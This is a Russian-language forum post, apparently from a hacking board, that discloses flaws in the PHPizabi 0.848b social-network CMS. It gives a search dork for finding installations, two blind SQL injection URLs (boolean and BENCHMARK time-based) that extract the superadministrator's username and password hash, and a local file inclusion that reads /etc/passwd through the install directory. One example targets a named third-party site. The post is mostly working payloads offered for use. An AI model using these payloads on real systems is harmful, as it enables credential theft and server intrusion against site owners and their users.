![]() |
Уязвимости PHPizabi 0.848b (latest version)
Уязвимости PHPizabi 0.848b(latest version)
(возможно уязвимы и более ранние версии) download: http://www.phpizabi.net/?L=downloads.downloadcore&X=dist.core.download&lat est=1 dork: "Powered by PHPizabi v0 848b C1 HFP1" 1) [Blind SQL-injection] (требования: magic_quotes=off) /modules/users/profile.php уязвимый код: PHP код:
Код:
index.php?L=users.profile&id=1'+and+ascii(substring((select+concat_ws(0x3a,username,password)+from+phpizabi_users+where+is_superadministrator=1+and+active=1+limit+0,1),1,1))>50--+/modules/blog/edit.php уязвимый код: PHP код:
Код:
http://localhost/hack/izabi/?L=blogs.edit&id=1'+or+if(ascii(substring((select+concat_ws(0x3a,username,password)+from+phpizabi_users+where+is_superadministrator=1+and+active=1+limit+0,1),1,1))>1,BENCHMARK(1000000,md5(current_date)),2)--+/install/index.php уязвимый код: PHP код:
можно заинклудить хоть массив файлов =) Код:
install/?processors[]=../../../../../../../../../etc/passwdCMS не требует, и даже никак не намекает, что директорию install лучше удалить ;) Код:
http://arlance.net/install/?processors[]=../../../../../../../../../etc/passwd |
| Время: 12:54 |